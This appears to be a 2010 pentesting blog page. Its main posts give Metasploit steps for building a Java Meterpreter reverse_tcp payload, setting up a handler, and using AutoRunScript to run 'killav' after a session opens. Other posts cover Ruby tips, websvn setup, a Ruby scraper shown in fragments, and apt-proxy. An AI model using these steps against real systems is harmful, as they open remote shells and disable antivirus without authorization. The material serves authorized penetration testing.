0x0e.org | pentesting perspective

braindump on pentesting, QA, metasploit, constant learning

Metasploit HowTo: Standalone Java Meterpreter Connect-Back

with 5 comments

Here are some quick notes on how to create a connect-back Java Meterpreter .jar file. The process is very straightforward, simply generate the .jar, setup a handler. Then move the .jar to your target & execute it.

Note! Nightranger’s method to do this is currently out of date (10/17/2010).

Following mihi’s instructions, create the payload:

msf exploit(java_signed_applet) > use test/java_tester
msf exploit(java_tester) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_tester) > set LHOST
msf exploit(java_tester) > set LPORT 4444
msf exploit(java_tester) > exploit
[*] Started reverse handler on
[*] Sending stage (26938 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-10-17 17:50:29 -0500
[*] Exploit completed, but no session was created.
msf exploit(java_tester) > [*] Meterpreter session 1 closed.  Reason: Died
msf exploit(java_tester) > ls

now, set up the handler:

msf exploit(java_tester) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

copy the payload to the target & run it, and you’re golden. no need to fiddle with classpath or anything, the loader jar is self-contained.

Written by jcran

October 17, 2010 at 11:41 PM

Posted in howto, metasploit

searching ruby source code

with one comment

contributing to open source? need to search & understand ruby code faster? This bash function should save you some time. I use it atleast 50-60 times a day.

Stick this in your .bashrc:

function rgrep() {
   find -L . -type f -name \*.rb -exec grep -n -i -H --color "$1" {} \;

Use like: $ rgrep “something”

Written by jcran

July 19, 2010 at 4:21 PM

Posted in utility

Tagged with , , , ,

ruby hash per-value defaults

leave a comment »

Here’s a quick tip for assigning default values with a ruby hash. It’s well publicized that you can set an overall default (i think this is called “default assignment”) for the hash with the .default method like this (stolen directly from the rubydocs):

h = Hash.new                            #=> {}
   h.default                               #=> nil
   h.default(2)                            #=> nil

   h = Hash.new("cat")                     #=> {}
   h.default                               #=> "cat"
   h.default(2)                            #=> "cat"

   h = Hash.new {|h,k| h[k] = k.to_i*10}   #=> {}
   h.default                               #=> 0
   h.default(2)                            #=> 20</pre>

But you can also set per-key defaults using the or-operator. if an assigned value is false, or nil, you’ll get the default value. See below:

ruby-1.9.1-p378 > x = {}
=> value: {}
ruby-1.9.1-p378 > x[:y] = "y"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = "y" || "noty"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = nil || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = false || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = "" || "noty"
=> value: ""

… Note that or-assignment doesn’t work in this case:

ruby-1.9.1-p378 > x[:y] = "" ||= "noty"
SyntaxError: (irb):19: syntax error, unexpected tOP_ASGN, expecting $end
x[:y] = "" ||= "noty"
from /home/jcran/.rvm/rubies/ruby-1.9.1-p378/bin/irb:17:in `<main>'
ruby-1.9.1-p378 >

Written by jcran

July 19, 2010 at 4:12 PM

Posted in Uncategorized

10 min project hosting & sharing

with one comment

Need a simple way to backup (and share) local files & scripts? Yeah yeah, another svn/websvn howto – but my brain sucks, and i forget this stuff if i don’t write it down…

The only prereqs to this quick howto are that you have an ubuntu box and you know a thing or two about subversion. Preferably a shellhost – I use slicehost and i’ve heard great things about linode.com.

I use svn for many of my projects, and for my toolkit. Tonight i needed to quickly and securely share a few files from that toolkit, so i stuck websvn on a host, and configured htaccess authentication. Total time? 10 min. Here’s the setup.

(Yes, i know the cool kids are all on git now)

  • Create subversion repository in /var/svn
cd /var/svn
svnadmin create repository
  • install apache / websvn (apt-get install)
$apt-get install apache2 websvn
  • Configure websvn – this is handled with the debian package, so when you’re done, your config (/etc/websvn/svn_deb_conf.inc) should look like this
// please edit /etc/websvn/config.php
// or use dpkg-reconfigure websvn
$config->addRepository("repository", "file:///var/svn/repository");
  • Create htpasswd file
$htpasswd -c -s /var/svn/htaccess testuser
  • Configure htpasswd in apache config (/etc/websvn/apache.conf)
# Configuration for websvn using php4.
Alias /websvn /usr/share/websvn
<Directory /usr/share/websvn>
DirectoryIndex index.php
Options FollowSymLinks
Order allow,deny
Allow from all
AuthType Basic
AuthName "Subversion Repository"
Require valid-user
AuthUserFile /var/svn/htaccess
<IfModule mod_php4.c>
php_flag magic_quotes_gpc Off
php_flag track_vars On
  • Restart Apache and you’re done.
$/etc/init.d/apache2 restart

Written by jcran

July 13, 2010 at 6:01 AM

Posted in howto, utility

scrape scrape scrape

with 2 comments

totally half-finished thought. maybe it’ll spawn an idea for you… there’s a zillion+1 ways to scrape information from the web these days. here’s the easiest i’ve found:

require 'nokogiri'
require 'open-uri'
require 'tidy_ffi'

class CrappyScraper

	attr_accessor :doc	
	def search(keyword)
		@doc = Nokogiri::HTML(open("http://www.google.com/search?q=" + keyword))

		@doc.xpath('//h3/a').each do |node|
			puts node.text

	def scrape(url)
		@doc = Nokogiri::HTML(open(url))
		@doc.xpath('//span/a').each do |node|
  			puts node.text

	def write_clean(filename)
		File.open(filename, 'w') do |f| 
						doc_clean = TidyFFI::Tidy.new(@doc.to_s).clean
	def to_s
	def write(filename)
		File.open(filename, 'w') { |f| f.write(@doc) }

x = CrappyScraper.new
puts x.to_s

Written by jcran

July 12, 2010 at 2:36 PM

Posted in Uncategorized

Apt-proxy installation notes

with 6 comments

No big secret that i’m a huge fan of ubuntu as a pentesting platform, and run it as my main OS. Recently I’ve had enough systems to justify tossing in an apt-proxy installation. Nothing groundbreaking, but may save a few mins for you. Here’re my notes.


Choose an (ubuntu) machine to install apt-proxy on:

$ sudo apt-get install apt-proxy

After the install, edit the /etc/apt-proxy/apt-proxy-v2.conf file to configure your listening address:

address = [internal listening address]

Restart the apt-proxy daemon:

$ sudo /etc/init.d/apt-proxy restart

That’s it for the server


Setting a client up to use the proxy requires editing a few lines of your /etc/apt/sources.list. The Apt-proxy howto (https://help.ubuntu.com/community/AptProxy) gives a good example:

Replace mentions of specific repository URL (in /etc/apt/sources.list) with references to your server and the backend for it; such as:

deb http://archive.ubuntu.com/ubuntu karmic main restricted
deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe

would become:

deb http://server:9999/ubuntu karmic main restricted
deb http://server:9999/ubuntu-security karmic-security main restricted universe

Pretty straightforward. Just make sure you append the “-security” piece onto the proxy URL for both security and updates. In the case of my /etc/apt/sources.list:

# standard packages
deb http://%5Binternal listening address]:9999/ubuntu karmic main restricted universe multiverse
deb-src http://%5Binternal listening address]:9999/ubuntu karmic main restricted universe multiverse

# update packages
deb http://%5Binternal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse
deb-src http://%5Binternal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse

# security packages
deb http://%5Binternal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse
deb-src http://%5Binternal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse

Run an apt-get update / apt-get upgrade and you’re golden. Rinse & repeat for all clients.


Written by jcran

July 5, 2010 at 8:21 PM

Posted in Uncategorized

Tagged with , , , , ,

Scripting Post-Exploitation

with 5 comments

A common question that comes up with post-exploitation is the need to run multiple things when a meterpreter session is initiated.

You can easily run a single command using the ‘AutoRunScript’ option. For example:

msf (psexec) > set AutoRunScript killav

However, if you need multiple things to run, there’re a couple multi-runner scripts that you should know about: multiscript, multicommand, and multi_console_command. They can take either a -c or a -rc option, which will provide the list of items to run. These scripts were provided by dark0perator.

Sidenote: If you’re using the multi* scripts, it’s better to use the -rc option. The parsing for the multi-command scripts doesn’t handle spaces well.

msf (psexec) > set AutoRunScript multi_console_command -c ‘command, command, command’ ## Don’t do this

It’s much better to use an external rc file where commands.rc is just a list of commands one-per-line like:

run killav

Then call it like:

msf (psexec) > set AutoRunScript multi_console_command -rc commands.rc

Another (non-recommended) trick is to set the InitialAutoRunScript option ie ‘set InitialAutoRunScript killav’ if you only need two scripts to run – but generally InitialAutoRunScript shouldn’t be touched except by exploits. It’s intended for exploits that know the target process is going to die, so they can migrate. (thanks to egyp7 for the info).

Written by jcran

July 2, 2010 at 5:51 PM